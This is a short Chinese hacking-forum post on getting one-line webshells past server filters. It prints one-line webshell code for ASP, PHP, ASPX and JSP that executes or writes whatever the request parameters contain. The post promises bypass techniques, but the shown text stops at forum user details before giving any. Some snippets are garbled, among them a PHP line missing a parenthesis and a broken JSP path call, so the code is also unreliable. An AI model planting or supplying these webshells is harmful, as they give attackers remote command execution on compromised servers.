[讨论]一句话木马的绕过过滤技巧 木马, 技巧, 讨论

richy

[讨论]一句话木马的绕过过滤技巧
文章作者：Awolf
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

  一句话木马在拿shell的时候总有很大作用，但是经常遇到这样情况：经过过滤后把我们小马都变了个某样了，让我们小菜素手无策！当然有人会说依情况而定，没错是这样的要灵活变通。这个帖子主要和大家讨论下一些常见的情况和如何绕过防注入的方法！让我们学习学习~~
   asp一句话：
复制内容到剪贴板
代码:
<%executerequest("p")%>
php一句话：
复制内容到剪贴板
代码:
<?php eval($_POST[cmd];?>
aspx一句话：
复制内容到剪贴板
代码:
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
jsp一句话：
复制内容到剪贴板
代码:
＜%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("("f"))).write(request.getParameter("t").getBytes());

%＞
这里主要针对asp和php还有aspx的，这三个比较经常用！
帖子14 精华0 积分51 阅读权限40 在线时间19 小时 注册时间2007-12-3 最后登录2008-7-22 查看详细资料TOP 软件项目外包

ring04h
团队执行官